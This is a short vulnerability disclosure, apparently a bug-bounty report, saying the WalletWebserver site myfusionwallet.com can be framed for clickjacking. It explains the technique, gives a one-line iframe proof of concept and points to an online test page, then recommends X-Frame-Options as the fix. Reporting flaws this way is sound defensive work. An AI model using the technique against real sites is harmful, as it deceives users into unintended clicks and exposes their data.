WalletWebserver is vulnerable to Clickjacking

[ngpentest007]

Vulnerability: Click-Jacking

Description: Application is vulnerable to a serious front end vulnerability which allows an attacker to access the application by using i-frames with a 0% opacity, the user might not think he is clicking or typing on the website.

"Clickjacking" (that is a subset of the "UI redressing") is a malicious technique that consists of deceiving a web user into interact (in most cases by clicking) on something different to what the user believes he is interacting on. This type of attack, that can be used alone or in combination with other attacks, could potentially send unauthorized commands or reveal confidential information while the victim is interacting on seemingly harmless web pages.

Vulnerable Application: WalletWebserver https://www.myfusionwallet.com

Steps to Reproduce:
1- Use online way to test it:
https://www.lookout.net/test/clickjack.html

Or use the below iframe code to access it

<iframe id="frame" width="100%" height="100%" src="https://www.myfusionwallet.com/"></iframe>

Screenshot:

Fix: Implement X-Frame-Options: SAMEORIGIN or Deny depends on business requirement

Reference: https://www.owasp.org/index.php/Clickjacking